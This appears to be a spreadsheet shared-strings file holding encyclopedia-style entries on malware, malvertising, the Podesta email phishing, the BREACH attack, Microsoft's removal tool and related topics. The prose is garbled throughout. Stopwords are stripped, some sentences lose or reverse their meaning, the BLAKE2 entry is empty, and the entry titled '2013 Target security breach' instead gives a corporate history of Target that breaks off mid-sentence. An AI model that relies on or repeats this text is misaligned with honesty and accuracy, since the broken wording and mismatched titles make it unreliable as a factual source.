    <t>Malware Bell</t>
  </si>
  <si>
    <t>malware bell malware program made taiwan somewhere 2006 2007. installation malware bell tries install automatically upon visiting website promoting containing malware. symptoms some files translated chinese language. time date reset lowest number (e.g. january 1901, 12.00 changes time-to-time. creates "taiwan" folders chinese-language files automatically anywhere computer consumes large amount memory, usually open time. several results google changed pornography advertising. external links</t>
  </si>
  <si>
    <t>Podesta emails</t>
  </si>
  <si>
    <t>march 2016, personal gmail account john podesta, former white house chief staff chair hillary clinton's 2016 u.s. presidential campaign, compromised data breach accomplished spear-phishing attack, emails, many work-related, hacked. cybersecurity researchers well united states government attributed responsibility breach russian cyber spying group fancy bear, allegedly units russian military intelligence agency.some podesta emails subsequently obtained wikileaks, published 20,000 pages emails, allegedly podesta, october november 2016. podesta clinton campaign declined authenticate emails. cybersecurity experts interviewed politifact believe majority emails probably unaltered, stating possible hackers inserted least doctored fabricated emails. article attests clinton campaign, however, produce evidence specific emails latest leak fraudulent. subsequent investigation u.s. intelligence agencies also reported files obtained wikileaks u.s. election contained "evident forgeries".podesta's emails, released wikileaks, shed light inner workings clinton campaign, suggested commentator donna brazile shared audience questions clinton campaign advance town hall meetings, contained excerpts hillary clinton's speeches wall street firms. proponents extensively discredited pizzagate conspiracy theory falsely claimed emails contained coded messages supported conspiracy theory. data theft researchers atlanta-based cybersecurity firm dell secureworks reported emails obtained data theft carried hacker group fancy bear, group russian intelligence-linked hackers also responsible cyberattacks targeted democratic national committee (dnc) democratic congressional campaign committee (dccc), resulting wikileaks publishing emails hacks.secureworks concluded fancy bear sent podesta email march 2016, appearance google security alert, actually contained misleading link—a strategy known spear-phishing. (this tactic also used hackers break accounts notable persons, colin powell). link—which used shortening service bitly—brought podesta fake log-in page entered gmail credentials. email initially sent department suspected fake described "legitimate" e-mail sent department employee, later said meant write "illegitimate".secureworks tracked activities fancy bear year cyberattack, june 2016, reported group made malicious bitly links fake google login pages trick targets divulging passwords. however, hackers left bitly accounts public, allowing secureworks trace many links e-mail accounts targeted spear-phishing attacks. list targeted accounts, hundred policy advisors clinton, members presidential campaign, june, twenty staff members clicked phishing links.on december 2016, told u.s. legislators u.s. intelligence community concluded russian government behind hack, gave wikileaks collection hacked emails john podesta. authenticity declassified report central intelligence agency (cia), federal bureau investigation (fbi), national security agency (nsa) noted that, "moscow likely chose wikileaks self-proclaimed reputation authenticity. disclosures wikileaks contain evident forgeries."cybersecurity experts interviewed politifact believe emails probably unaltered, possible hackers inserted doctored fabricated material collection.jeffrey carr, cybersecurity company taia global, stated: "i've looked document dumps provided hacker groups years, almost every case find altered entirely falsified documents. few. vast majority genuine. believe that's case podesta emails, well." jamie winterton arizona state university global security initiative stated, would shocked emails altered," noting longstanding russian practice promoting disinformation.cybersecurity expert robert graham described contents emails authentic using domainkeys identified mail (dkim) contained emails' signatures. however, emails keys signature, thus could verified method. publication october 2016, minutes access hollywood tape first published, wikileaks began publishing thousands emails podesta's gmail account. throughout october, wikileaks released installments emails daily basis. december 2016, john podesta stated meet press contacted leaked emails october 2016, contacted since.on october 2016, government ecuador severed internet connection wikileaks founder julian assange ecuadorian embassy london. ecuadorian government stated temporarily severed assange's internet connection wikileaks' release documents "impacting u.s. election campaign", although also stated meant prevent wikileaks operating. wikileaks continued releasing installments podesta emails time. contents some emails provide insight inner workings clinton campaign. example, emails show discussion among campaign manager robby mook aides possible campaign themes slogans. other emails revealed insights internal conflicts clinton foundation. published article detailing "revelations" revealed initial review leaked emails, including excerpts clinton's speeches politically motivated payments clinton foundation.one emails released october 2016, included podesta's icloud account password. icloud account hacked, twitter account briefly compromised. some emails barack obama podesta exchanged 2008. clinton's wall street speeches wikileaks published transcripts three clinton speeches goldman sachs 80-page internal campaign document cataloging potentially problematic portions paid speeches. during democratic primary campaign, bernie sanders criticized hillary clinton refusing release transcripts speeches given financial firms, portraying close wall street. donald trump first publicly called transcripts rally october 2016, four days publication wikileaks: would like speeches said. want release them. release papers, hillary, release papers."in october 2016 presidential debate, clinton voiced support "no-fly" zone syria. 2013 speech, clinton discussed difficulties involved. particular, noted order establish no-fly zone, syria's defenses would need destroyed. because assad government located anti-aircraft batteries populated civilian areas, destruction would cause many collateral civilian deaths. clinton's staff additionally flagged comments regulation wall street, well relationship industry, potentially problematic.the excerpts came subsequent presidential debates clinton trump. debates, moderator martha raddatz quoted excerpt saying politicians "need public private position" asked clinton okay politicians "two-faced". clinton replied, recall, something said abraham lincoln seen wonderful steven spielberg movie called lincoln. master class watching president lincoln congress approve 13th amendment, principled strategic. making point hard sometimes congress want do." third presidential debate, moderator chris wallace quoted speech excerpt clinton says, dream hemispheric common market open trade open borders," asked open borders. clinton replied, went read rest sentence, talking energy. trade energy neighbors trade rest world combined. want electric grid, energy system crosses borders." discussions catholic religious activities sandy newman wrote podesta: thought would 'plant seeds revolution', would plant them." podesta agreed necessary newman suggested wrote back note created groups like catholics alliance common good catholics united push progressive approach faith, change would "have bottom up".raymond arroyo responded: makes seem like creating organizations change core beliefs church," said. "for someone come say, political organization change church complete political agenda advance agenda', know anybody could embrace that." professor robert george added "these groups political operations constructed masquerade organizations devoted catholic faith".the leak revealed email sent john halpin, senior fellow center american progress. email discussed conservative media mogul rupert murdoch's decision raise kids catholic church. wrote, "many powerful elements conservative movement catholic (many converts) it's amazing bastardization faith. they must attracted systematic thought severely backwards gender relations must totally unaware christian democracy." palmieri responded: imagine think socially acceptable, politically conservative religion—their rich friends understand became evangelical." supporters members donald trump's campaign called email exchange evidence anti-catholic sentiment democratic party. halpin confirmed written email, though contested claims "anti-catholic" said taken context sent email catholic colleagues make fleeting point perceived hypocrisy flaunting one's faith prominent conservative leaders." presidential debate questions shared donna brazile october 2016, wikileaks released text email sent donna brazile march 2016, clinton communications director jennifer palmieri subject header "from time time questions advance." email included question death penalty. following clinton received similar question townhall host, roland martin. brazile initially denied coordinating clinton campaign, spokesperson said "cnn share questions donna brazile, anyone else matter, prior town hall" never, ever given town hall question anyone beforehand". according cnnmoney, debate moderator roland martin deny shared questions brazile. another leaked email, brazile wrote: "one questions directed tomorrow woman rash. family lead poison what, anything, hillary president help flint." debate flint following day, woman whose "son developed rash contaminated water" asked clinton: elected president, course take regain trust government?" third email, brazile added: "i'll send more."cnn severed ties brazile october 2016. brazile later said give "the ability defend myself" email release referred wikileaks "wikilies". brazile repeatedly denied received question death penalty advance said documents released wikileaks "altered". essay time written march 2017, brazile wrote emails revealed "among many things role democratic operative d.n.c. vice chair [...] share potential town hall topics clinton campaign." wrote, make democratic candidates look good, worked closely campaigns make happen. sending emails mistake forever regret." saudi arabia qatar leaked email august 2014, addressed podesta, identifies saudi arabia qatar providing "clandestine", "financial logistic" isis "radical sunni groups". email outlines plan action isis, urges putting pressure saudi arabia qatar alleged support group. whether email originally written hillary clinton, advisor sidney blumenthal, another person unclear. reactions american public's interest wikileaks october roughly coincided tightening presidential race trump clinton. according analysis opinion polling harry enten fivethirtyeight, release emails roughly matched clinton's decline polls, though seem effect public perceptions trustworthiness. enten concluded wikileaks' activities "among factors might contributed [clinton's] loss."sociology professor zeynep tufekci criticized wikileaks handled release emails, writing, "taking campaign manager's email account releasing zero curation last month election needs treated political sabotage, whistle-blowing." op-ed intercept, james risen criticized media reporting emails, arguing hacking emails significant story content emails themselves. thomas frank, writing editorial column guardian, argued emails gave "unprecedented view workings elite, looks itself".glen caplin, spokesman clinton campaign, said, dribbling every wikileaks proving nothing propaganda kremlin political agenda [vladimir] putin's dirty work help elect donald trump." when asked comment emails' release, president vladimir putin replied russia falsely accused. said, "the hysteria merely caused fact somebody needs divert attention american people essence exposed hackers." also 2016 democratic national committee email leak democratic national committee cyber attacks october surprise pizzagate conspiracy theory plot hack america references external links podesta emails blog politico</t>
  </si>
  <si>
    <t>Malvertising</t>
  </si>
  <si>
    <t>malvertising portmanteau "malicious software (malware) advertising") online advertising spread malware. typically involves injecting malicious malware-laden advertisements legitimate online advertising networks webpages. online advertisements provide solid platform spreading malware significant effort order attract users sell advertise product. because advertising content inserted high-profile reputable websites, malvertising provides malefactors opportunity push attacks users might otherwise ads, firewalls, safety precautions, like. malvertising "attractive attackers 'can easily spread across large number legitimate websites without directly compromising websites'."malvertising fairly concept spreading malware extremely hard combat quietly work webpage advertisement webpage spread unknowingly: "the interesting thing infections delivered malvertising require user action (like clicking) compromise system exploit vulnerabilities website server hosted from... infections delivered malvertising silently travel page advertisements." able expose millions users malware, even cautious, growing rapidly: 2012, estimated nearly billion impressions compromised malvertising." attackers wide reach able deliver attacks easily advertisement networks. companies websites difficulty diminishing number malvertising attacks, "suggests attack vector isn’t likely disappear soon." overview when websites publishers unknowingly incorporate corrupted malicious advertisements page, computers become infected pre-click post-click. misconception infection happens visitors begin clicking malvertisement. "examples pre-click malware include embedded main scripts page drive-by-downloads. malware also auto-run, case auto redirects, user automatically taken different site (without user interaction, clicking them), could malicious. malware also found delivery clean malware pre- post-click build design) still infected whilst called. malicious code hide undetected user idea what's coming way. post-click malvertisement example: "the user clicks visit advertised site, instead directly infected redirected malicious site. these sites trick users copying viruses spyware usually disguised flash files, popular web." redirection often built online advertising, spread malware often successful users expect redirection happen clicking advertisement. redirection taking place needs co-opted order infect user's computer.malvertising affects every part digital advertising chain differently. from platforms publishers, end-user victim malvertising attack, everyone affected. malvertising often involves exploitation trustworthy companies. those attempting spread malware place "clean" advertisements trustworthy sites first order gain good reputation, later "insert virus spyware code behind mass virus infection produced, remove virus", thus infecting visitors site time period. identities responsible often hard trace, making hard prevent attacks stop altogether, network infrastructure complex many linked connections click-through destinations."some malvertisements infect vulnerable computer even user never clicks (normal-appearing) advertisement. history 2007/2008: first recorded sighting malvertising late 2007 early 2008. this threat based vulnerability adobe flash (something continued late 2010s) affected number platforms including myspace, excite rhapsody. 2009: online edition york times magazine found serving part larger click fraud scam created botnet network malware-infected computers, nicknamed bahama botnet, went used carry click fraud click web. banner feed york times hacked weekend september causing readers advertisements telling systems infected trying trick installing rogue security software computers. according spokeswoman diane mcnulty, "the culprit approached newspaper national advertiser provided apparently legitimate week", switched virus alert malvertisement afterwards. york times suspended third-party advertisements address problem, even posted advice readers regarding issue technology blog.2010: malvertising takes off. marketing analysts clickz noted online trust alliance (ota) identified billions display ads, across 3500 sites carrying malware. year online trust alliance formed cross industry anti-malvertising task force. 2011: spotify malvertising attack used blackhole exploit first instances drive-by download, user even click become infected malware. according blue coat systems 2012 security report, 2011 increase 240% malvertising based malicious sites. 2012: symantec includes malvertising section internet security threat report 2013 looked back landscape 2012. symantec used scanning software across series websites detected half infected malvertising. 2012, angeles times massive malvertising attack used blackhole exploit infect users. seen part general campaign malvertising large news portals strategy carried subsequent years attacks huffingtonpost.com york times. 2013: major malvertising campaign waged yahoo.com, largest platforms monthly visits billion. malware exploit based commonly used attack, cross-site scripting (xss), number three attacks types identified open application security project (owasp). attack infected users' machines ransomware cryptowall, type malware extorts money users encrypting data placing ransom $1000 bitcoins, paid days, decrypt data. 2014: 2014, major malvertising campaigns doubleclick zedo networks. various news portals, including times israel hindustan times, affected. previous attacks cybercrime involved cryptowall malware infection. this spate malvertising believed brought million ransom money infecting 600,000 computers.2015: mcafee's threat report february 2015 said malvertising growing quickly mobile platforms. 2015 malvertising campaigns ebay, answers.com, talktalk.co.uk, wowhead.com, among others. campaigns involved breaches networks, including doubleclick engage:bdr. there also report possibly first "political malvertising" campaign pro-russian activists, based botnet, forced users' machines visit bogus sites generated revenue activists. users also ended several pro-russian propaganda videos.2021: ransomware gang revil spotted using paid positioning google search results deliver malicious files victims.2021: malvertising cash cryptocurrency giveaway campaigns actors masquerading popular figures including youtuber mrbeast, elon musk, others seen across many advertising platforms social media sites. more examples malicious advertisements several popular websites news sources victims malvertising malicious advertisements placed webpages widgets unknowingly, including horoscope.com, york times, london stock exchange, spotify, onion. types modes visiting websites affected malvertising, users risk infection. there many different methods used injecting malicious advertisements programs webpages: pop-up deceptive downloads, fake anti-virus programs install malicious software computer in-text in-content advertising drive-by downloads widgets redirection co-opted redirecting malicious site hidden iframes spread malware websites content delivery networks exploited share malware malicious banners websites third-party advertisements webpages third-party applications, forums, help desks, customer relationship management content management systems preventive measures there several precautions people take reduce chances getting tricked advertisements. commonly used programs adobe flash player adobe reader flaws exploited, become vulnerable attacks, important avoid them, least keep date. users also download anti-virus software protects threats removes malicious software systems. users also push companies websites scan advertisements making active webpages. users also blocking software avoid downloading malware contained advertisements specific browser extension alerting malvertising campaigns. also social engineering (security) tech support scam references external links what need know about malvertising</t>
  </si>
  <si>
    <t>Malumpos Malware</t>
  </si>
  <si>
    <t>malumpos point sale malware designed steal scrape customer’s credit debit card detail point sale system. these designed records point sale’s data running oracle micros payment system restaurant. collected data used 333,000 customer sites around world. malumpos malware targets hotels businesses retail customers risk. this scraper written delphi programming language. malumpos monitors, processes, scrapes stolen data infected system ram. first stores stolen credit debit card details customer infected point sale system swiped. then sends data cybercriminal empty customer bank balance details sold black market. malumpos gets installed much like point sale malware, malumpos computer unknowingly conceals identity nvidia display driver nvidia display driv3r. this malware appears legitimate software victims peripherals function correctly. this malware infects oracle micros, oracle forms, shift4 systems systems accessed internet explorer. also point sale cyber security standards list cyber attack threat trends cyber electronic warfare point-of-sale malware malware references</t>
  </si>
  <si>
    <t>BLAKE2</t>
  </si>
  <si>
    <t>BREACH</t>
  </si>
  <si>
    <t>breach backronym: browser reconnaissance exfiltration adaptive compression hypertext) security vulnerability https using http compression. breach built based crime security exploit. breach announced august 2013 black conference security researchers angelo prado, neal harris yoel gluck. idea discussed community announcement. details while crime attack presented general attack could work effectively large number protocols, exploits spdy request compression compression demonstrated largely mitigated browsers servers. crime exploit http compression mitigated all, even though authors crime warned vulnerability might even widespread spdy compression combined. breach instance crime attack http compression—the gzip deflate data compression algorithms content-encoding option within http many browsers servers. given compression oracle, rest breach attack follows general lines crime exploit, performing initial blind brute-force search guess bytes, followed divide-and-conquer search expand correct guess arbitrarily large amount content. mitigation breach exploits compression underlying http protocol. therefore, turning compression makes difference breach, still perform chosen-plaintext attack http payload.as result, clients servers either forced disable http compression completely (thus reducing performance), adopt workarounds foil breach individual attack scenarios, using cross-site request forgery (csrf) protection.another suggested approach disable http compression whenever referrer header indicates cross-site request, header present. this approach allows effective mitigation attack without losing functionality, incurring performance penalty affected requests. another approach padding tls, http header, payload level. around 2013–2014, ietf draft proposal extension length-hiding padding that, theory, could used mitigation attack. allows actual length payload disguised insertion padding round fixed lengths, randomize external length, thereby decreasing likelihood detecting small changes compression ratio basis breach attack. however, draft since expired without action. effective mitigation (heal-the-breach). modifies compression library gzip server randomness size output contents. this randomness precludes breach guessing correct characters secret token. protects websites pages server minimal usage minimal bandwidth increase. references external links tool runs breach attack demonstrated blackhat 2013 heist, related compression-based attack body response demonstrated blackhat 2016</t>
  </si>
  <si>
    <t>2014 Russian hacker password theft</t>
  </si>
  <si>
    <t>2014 russian hacker password theft alleged hacking incident resulting possible theft billion internet credentials, including usernames passwords, hundreds millions corresponding e-mail addresses. data breach first reported york times (and reported many media) allegedly discovered reported milwaukee-based information security company, hold security.420,000 websites reported affected. according york times source, companies know user's credentials among stolen. hold security disclose sites compromised, but, instead, offered separate services, website owners consumers check they're affected. service website owners costs month. check consumers free.hold security described group responsible hack small group “fewer dozen based small city south central russia, region flanked kazakhstan mongolia,” dubbed group cybervor (russian, lit. "cyber thief"). hold claimed hack perpetrated injection. according forbes article, hold security says billion credentials stolen way, also ones cybervor simply bought people used means, hold security know split criticism hold security forbes columnist, kashmir hill, noted "the internet predictably panicked story another massive password breach went viral." "[t]his pretty direct link panic pay-out security firm." hold security's website service offering people check username password pair stolen. requires people send hold security encrypted versions passwords. skepticism named independent sources come forward confirm breach, forbes columnist, joseph steinberg, even expressed outright skepticism many "facts" claimed breach, raising questions trustworthiness reports breach altogether. references</t>
  </si>
  <si>
    <t>Malicious Software Removal Tool</t>
  </si>
  <si>
    <t>microsoft windows malicious software removal tool freely distributed virus removal tool developed microsoft microsoft windows operating system. first released january 2005, on-demand anti-virus tool ("on-demand" means lacks real-time protection) scans computer specific widespread malware tries eliminate infection. automatically distributed microsoft windows computers windows update service also separately downloaded microsoft download center. reporting tool records results file located %windir%\debug\mrt.log. manually times, users windows command prompt command start menu windows key, start "mrt.exe". example: windows+r%windir%\system32\mrt.exe↵ enter tool configured report anonymized data detected infections microsoft. reporting behavior disclosed tool's eula, disabled desired. results june 2006 microsoft report, company claimed tool removed million instances malicious software million million total unique windows computers since release january 2005. report also stated that, average, tool removes malicious software every computers runs. 2009, microsoft claimed software removed password stealer threats 859,842 machines.in august 2013, malicious software removal tool deleted old, vulnerable versions client spread sefnit botnet (which mined bitcoins without host owner's approval later engaged click fraud). approximately million hosts cleaned october; although slightly less half estimated infections, rest suspected machines presumably automatic windows updates enabled manually run. compatibility updates microsoft releases updated tool every second tuesday every month (commonly called "patch tuesday") windows update, point runs automatically background reports malicious software found. tool also available standalone download. since support windows 2000 ended july 2010, microsoft stopped distributing tool windows 2000 users windows update. last version tool could windows 2000 4.20, released 2013. starting version 5.1, released june 2013, support windows 2000 dropped altogether. although windows support ended april 2014, updates windows version malicious software removal tool would provided august, 2016; version 5.39. latest version msrt windows vista 5.47, released april 2017. despite microsoft ending general support windows operating system 2020, updates still provided windows users standard windows update delivery mechanism. references further reading external links official website</t>
  </si>
  <si>
    <t>BTCC (company)</t>
  </si>
  <si>
    <t>btcc (formerly bitcoin china) united kingdom-based bitcoin exchange world's second largest volume october 2014. founded june 2011 btcchina, china's first bitcoin exchange, customers thought domestic market. btcchina rebranded btcc launched domain www.btcc.com 2015. history former company bobby approached two-person company early 2013, investing money attracting investors, oversaw company's rapid expansion market share growth year. stanford computer science graduate, whose brother charlie founded cryptocurrency litecoin, previously worked yahoo! united states, vice president technology walmart china.in november 2013, btcchina raised million series funding investors, lightspeed china partners lightspeed venture partners.on december 2013, btcchina announced temporarily suspending acceptance chinese yuan deposits, attributing decision government regulations, following december statement people's bank china (pboc). january 2014, exchange resumed accepting yuan deposits, studying pboc statement rules. while pboc prohibited banks trading bitcoin, btcchina explained accepting yuan corporate bank account, transferring money customer accounts, traded bitcoins. references external links official site taiwan official site japan official site korea official site history bitcoin</t>
  </si>
  <si>
    <t>2013 Target security breach</t>
  </si>
  <si>
    <t>history target corporation first began 1902 george dayton. company originally named goodfellow goods june 1902 renamed dayton's goods company 1903 later dayton company 1910. first target store opened roseville, minnesota 1962 parent company renamed dayton corporation 1967. became dayton-hudson corporation merging j.l. hudson company 1969 held ownership several department store chains including dayton's, hudson's, marshall field's, mervyn's. 2000, dayton-hudson corporation renamed target corporation. 1902–61: dayton company westminster presbyterian church downtown minneapolis burned panic 1893; church looking revenue insurance would cover cost building. congregation appealed george dayton, active parishioner, purchase empty corner adjacent original church’s could rebuild; eventually constructed six-story building newly purchased property. looking tenants, dayton convinced reuben simon goodfellow company move nearby goodfellows department store newly erected building 1902, although owner retired altogether sold interest store dayton. store renamed dayton goods company 1903, shortened dayton company 1910. having maintained connections banker lacking previous retail experience, dayton operated company family enterprise held tight control enforced strict presbyterian guidelines. consequently, store forbade selling alcohol, refused advertise newspapers sponsored liquor ads, would allow kind business activity sundays. 1918, dayton, gave away money charity, founded dayton foundation million.by 1920s, dayton company multimillion-dollar business filled entire six-story building. dayton began transferring parts business nelson earlier 43-year-old david died 1923. company made first expansion acquisition minneapolis-based jeweler j.b. hudson right wall street crash 1929; jewelry store operated loss great depression, department store weathered economic crisis. dayton died 1938 succeeded nelson president million business, maintained strict presbyterian guidelines conservative management style father. throughout world nelson dayton's managers focused keeping store stocked, increase revenue. when production board initiated scrap metal drives, dayton donated electric sign department store local scrap metal heap. 1944, offered workers retirement benefits, becoming first stores united states began offering comprehensive health insurance policy 1950. 1946, business started contributing taxable income dayton foundation.nelson dayton replaced president donald death 1950; company alongside four cousins instead single person, replaced presbyterian guidelines secular approach. began selling alcohol operating sundays, favored radical, aggressive, innovative, costly, expansive management style. company acquired portland, oregon-based lipman's department store company 1950s operated separate division. 1956, dayton company opened southdale center, two-level shopping center minneapolis suburb edina. because good shopping days year minneapolis, architect built mall cover, making world's first fully enclosed shopping mall. dayton company became retail chain opening second department store southdale. 1962–75: founding target while working dayton company, john geisse developed concept upscale discount retailing. 1962, dayton company, using geisse's concepts, opened first target discount store located 1515 west county road saint paul suburb roseville, minnesota. name "target" originated dayton's publicity director, stewart widdess, intended prevent consumers associating discount store chain department store. douglas dayton served first president target. subsidiary ended first year four units, minnesota. target stores lost money initial years reported first gain 1965, sales reaching million, allowing fifth store open minneapolis suburb bloomington, minnesota. 1964 dayton's second-largest privately owned department store chain country.in 1966, bruce dayton launched dalton bookseller specialty chain dayton company subsidiary. target stores expanded outside minnesota opening stores denver, sales exceeded million. first store built colorado 1966, first outside minnesota, located glendale, colorado part denver metropolitan area. store upgraded supertarget 2003 still open. next year, dayton holdings reorganized dayton corporation, went public first offering common stock. opened target stores minnesota, resulting total nine units. acquired francisco-based jeweler shreve co., merged previously acquired j.b. hudson become dayton jewelers. 1968, target changed bullseye logo modern look, expanded louis, missouri, stores. target's president, douglas dayton, went back parent dayton corporation succeeded william hodder, senior vice president founder john geisse left company. geisse later hired louis-based department stores, founded venture stores chain. target stores ended year units $130 million sales. acquired angeles-based pickwick book shops merged dalton bookseller.in 1969, company acquired boston-based lechmere electronics appliances chain operated england, philadelphia-based jewelry chain j.e. caldwell. expanded target stores texas oklahoma units built first distribution center fridley, minnesota. dayton company merged detroit-based j.l. hudson company year, become dayton-hudson corporation, 14th largest retailer united states, consisting target five major department store chains: dayton's, diamond's phoenix, arizona, hudson's, john brown oklahoma city, oklahoma, lipman's. company offered dayton-hudson stock york stock exchange. dayton foundation changed name dayton hudson foundation, dayton-hudson maintained donation taxable income foundation.in 1970, target stores added seven units, including units wisconsin, 24-unit chain reached $200 million sales. dayton-hudson said time could forecast discount store operations overshadowing department store revenue near future. dayton-hudson acquired team electronics specialty chain headed stephen pistner. acquired chicago-based jeweler c.d. peacock, inc., diego-based jeweler jessop sons. also 1970 dayton-hudson purchased ronzone's vegas, nevada, converted diamond's store. dayton-hudson announces january 1970 tenants center, first modern skyscraper built minneapolis, minnesota, would headquarters 2000. 1971, dayton-hudson acquired sixteen stores arlan's department store chain colorado, iowa, oklahoma. units reopened target stores year. dayton-hudson's sales across chains surpassed billion, target chain contributing fraction 1972, fourteen units arlan's acquisition reopened target stores make total units. result rapid expansion executives' lack experience discount retailing, chain reported first decrease profits since initial years. loss operational revenue overstocking carrying goods multiple years regardless inventory storage costs. then, dayton-hudson considered selling target stores subsidiary. dayton-hudson acquired twin cities mail order firms 1972, sibley consolidated merchandising. 1973, stephen pistner, already revived team electronics would later work montgomery ward ames, named chief executive officer target stores, kenneth macke named target stores' senior vice president. management marked merchandise clean overstock allowed unit open year. 1975–81: early prosperity 1975, target opened stores, reaching units nine states $511 million sales. that year, target discount chain became dayton-hudson's revenue producer. 1976 dayton-hudson eighth largest retailer u.s., target opened four units reached $600 million sales. macke promoted president chief executive officer target stores. inspired dayton hudson foundation, minneapolis chamber commerce started club (now known minnesota keystone program), honored companies donated taxable incomes charities. 1977, target stores opened seven units stephen pistner became president dayton-hudson, macke succeeding chairman chief executive officer target stores. senior vice president dayton-hudson, bruce allbright, moved target stores succeeded kenneth macke president. 1978, company acquired mervyn's became largest general merchandise retailer united states. target stores opened eight stores year, including first shopping mall anchor store grand forks, north dakota. 1979, opened units total target stores eleven states. dayton-hudson reached billion sales, $1.12 billion coming target store chain alone.dayton-hudson sold nine owned shopping centers 1978 equitable life assurance company, including owned michigan, "dales" shopping centers developed owned minnesota. 1980, dayton-hudson sold lipman's department store chain units marshall field's, rebranded stores frederick nelson. that year, target stores opened seventeen units, including expansions tennessee kansas. acquired ayr-way discount retail chain stores distribution center indianapolis-based l.s. ayres company. 1981 dayton-hudson sold interest four regional shopping centers, again, equitable life assurance company. also 1981, reopened stores acquired ayr-way acquisition target stores. stephen pistner left parent company join montgomery ward, kenneth macke succeeded president dayton-hudson. floyd hall succeeded kenneth macke chairman chief executive officer target stores. bruce allbright left company work woolworth, named chairman chief executive officer woolco. ulrich became president chief executive officer diamond's department stores. addition ayr-way acquisition, target stores expanded opening fourteen units third distribution center little rock, arkansas, total units $2.05 billion sales. 1982–99: nationwide expansion since launch target stores, company focused expansion central united states. 1982, expanded west coast market acquiring fedmart stores arizona, california, texas opening fourth distribution center angeles. bruce allbright returned target stores vice chairman chief administrative officer, chain expanded units $2.41 billion sales. sold dayton-hudson jewelers subsidiary henry birks sons montreal. 1983, kenneth dayton, last dayton family member work dayton-hudson retired. also 1983, units acquired fedmart reopened target stores. founded plums off-price apparel specialty store chain four units angeles area, intended audience middle-to-upper income women. 1984, sold plums chain ross stores months operation, sold diamond's john brown department store chains dillard's. meanwhile, target stores added nine units total stores $3.55 billion sales. floyd hall left company bruce allbright succeeded chairman chief executive officer target stores. 1984, ulrich became president dayton-hudson department store division, december 1984 became president target stores. 1986, company acquired fifty gemco stores lucky stores california arizona, made target stores dominant retailer southern california, chain grew total units. opened fifth distribution center pueblo, colorado. dayton-hudson sold dalton bookseller chain several hundred units barnes noble. time, dayton-hudson corporation also started housewares chain called branden's, operation unsuccessful.in 1987, acquired gemco units reopened target units, target stores expanded michigan nevada, including units detroit, michigan, compete directly detroit-based kmart, leading total units states $5.3 billion sales. bruce allbright became president dayton-hudson, ulrich succeeded chairman chief executive officer target stores. dart group attempted takeover aggressively buying stock. kenneth macke proposed amendments minnesota's 1983 anti-takeover law, proposed amendments passed summer state's legislature. this prevented dart group able call shareholders' meeting purpose electing board would favor dart turn hostile. dart originally offered share, raised offer $68. stock market crash october 1987 ended dart's attempt take company, dayton-hudson stock fell $28.75 share market crashed. dart's move estimated resulted after-tax loss million. 1988, target stores expanded northwestern united states opening eight units washington three oregon, total units states. opened distribution center sacramento, california, replaced existing distribution center indianapolis, indiana, ayr-way acquisition one. 1989, expanded units, especially southeastern united states entered florida, georgia, north carolina, south carolina, total units states $7.51 billion sales. this included acquisition stores federated department stores' gold circle richway chains florida, georgia, north carolina, later reopened target stores. sold lechmere chain year group investors including berkshire partners, leveraged buy-out firm based boston, massachusetts, eight lechmere executives, local shopping mall executives. 1990, acquired marshall field's batus inc., target stores opened first target greatland general merchandise superstore apple valley, minnesota. 1991, target stores opened target greatland units, sales reached $9.01 billion. 1992, created short-lived chain apparel specialty stores called everyday hero stores minneapolis. they attempted compete apparel specialty stores offering private label apparel merona brand. 1993, created chain closeout stores called smarts liquidating clearance merchandise, private label apparel, appeal typical closeout chains interested national brands. operated four smarts units former target stores rancho cucamonga, california, moines, iowa, paso, texas, indianapolis, indiana, closed merchandise nearby distribution centers. 1994, kenneth macke left company, ulrich succeeded chairman dayton-hudson. 1995, target stores opened first supertarget hypermarket omaha, nebraska. closed four smarts units years operation. store count increased $15.7 billion sales. launched target guest card, discount retail industry's first store credit card.in 1996, j.c. penney company, inc., fifth-largest retailer united states, offered dayton-hudson, fourth largest retailer, $6.82 billion. offer, analysts considered insufficiently valuing company, rebuffed dayton-hudson, saying preferred remain independent. target stores increased store count units states $17.8 billion sales, remained company's main area growth department store subsidiaries underperformed. middle scale mervyn's department store chain consisted units states, upscale department stores division operated marshall field's, hudson's, dayton's stores. 1997, everyday hero stores closed. target's store count rose units, sales rose $20.2 billion. effort turn department store chains around, mervyn's closed units, including stores florida georgia. marshall field's sold stores texas closed store milwaukee.in 1998, dayton-hudson acquired greenspring company's multi-catalog direct marketing unit, rivertown trading company, minnesota communications group, acquired associated merchandising corporation, apparel supplier. target stores grew units $23.0 billion sales. target guest card program registered nine million accounts.in 1999, dayton-hudson acquired fedco stores move expand supertarget operation southern california. reopened stores target brand sold four locations wal-mart, home depot, ontario police department, store count rose units states sales reaching $26.0 billion. revenue dayton-hudson increased $33.7 billion, income reached $1.14 billion, passing billion first time nearly tripling 1996 profits $463 million. this increase profit mainly target chain, ulrich focused making feature high-quality products prices. september 1999, company relaunched target.com website e-commerce site part discount retail division. site initially offered merchandise differentiated stores competitors, michael graves brand. 2000–11: target corporation january 2000, dayton-hudson corporation changed name target corporation ticker symbol tgt; then, percent percent corporation's total sales earnings came target stores, four chains—dayton's, hudson's, marshall field's, mervyn's—were used fuel growth discount chain, expanded stores states sales reached $29.7 billion year. separated e-commerce operations retailing division, combined rivertown trading unit stand-alone subsidiary called target.direct. started offering target visa, consumer trends moving towards third-party visa mastercards away private-label cards target guest card.in 2001, launched online gift registry, preparation this, wanted operate upscale department stores division, consisting dayton's, hudson's, marshall field's stores, unified department store name. announced january renaming dayton's hudson's stores marshall field's. name chosen multiple reasons: three, marshall field's recognizable name department stores division, base chicago bigger dayton's base minneapolis hudson's base detroit, chicago major travel hub, largest chain three. target stores expanded maine, reaching 1,053 units states $33.0 billion sales. around time, chain made successful expansion pittsburgh market, target capitalized collapse ames department stores coincidentally happened time target's expansion area. 2002, expanded 1,147 units, included stores leandro, fremont, hayward, california, sales reached $37.4 billion. most locations replaced former montgomery ward locations, closed 2001. 2003, target reached 1,225 units $42.0 billion sales. despite growth discount retailer, neither marshall field's mervyn's adding store count, earnings consistently declining. marshall field's sold stores columbus, ohio, year. june 2004, target corporation announced sale marshall field's chain louis-based department stores, would become effective july 2004. well, july 2004, target corporation announced $1.65 billion sale mervyn's investment consortium including capital partners, cerberus capital management, lubert-adler/klaff partners, l.p., finalized september target stores expanded 1,308 units reached us$46.8 billion sales. 2005, target began operation overseas technology office bangalore, india. reached 1,397 units $52.6 billion sales. february 2005, target corporation took million charge change accounted leases, would reconcile target depreciated buildings calculated rent expense. adjustment included million 2004 million prior years. 2006, target completed construction robert ulrich center embassy golf links bangalore, target planned continue expansion india construction additional office space mysore corporate campus successfully opened branch mysore. expanded 1,488 units, sales reached $59.4 billion. january 